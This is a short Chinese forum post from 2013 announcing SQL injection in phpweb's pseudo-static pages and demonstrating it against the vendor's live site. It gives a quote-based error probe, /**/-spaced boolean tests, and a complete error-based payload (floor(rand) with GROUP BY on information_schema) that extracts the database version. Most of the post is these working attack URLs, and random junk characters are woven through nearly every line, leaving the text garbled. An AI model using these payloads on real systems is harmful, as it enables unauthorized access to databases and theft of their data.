phpweb所有的整站程序伪静态页面都存在sql注入
% `; J: @( u) @9 E
: N% s2 z" Z- }! d4 {主站:http://phpweb.net/
0 W: |, Z' d8 {' S加’检测:# l+ Z( c: F- ?3 {" K4 L
* w7 Q1 Z! ~6 o& T% ?
http://www.phpweb.net/down/html/?772′.html
! X6 v0 e! \6 ?7 O/ T0 S ! q/ a) J {( F7 b( L2 \8 z
出错$ a, N) z& J# H0 D* B
存在注入。
( ^% d, e* o4 H$ B' I) o' Y3 ]8 B" `5 m不能用空格,只能用/*罗- g" M, O- s% `
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
2 U/ r! s* [7 F5 P v Y
4 x/ O3 R7 |7 Z1 D) Mhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
# @- G7 D9 F; E2 z+ Q7 B' n爆数据库版本:
2 s7 [0 V; s0 g: \6 t
9 ]# G& M' p9 f7 j5 b?* \: ?- i) U6 X% c6 T. m
15 u1 g' R' I. [ X% w
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
0 d( U$ k; `0 Z更新日期: 2013-01-03 13:39:50
7 j5 V8 r+ `& Z i& A( \ |
发表于 2013-1-4 19:46:42
收藏
支持
反对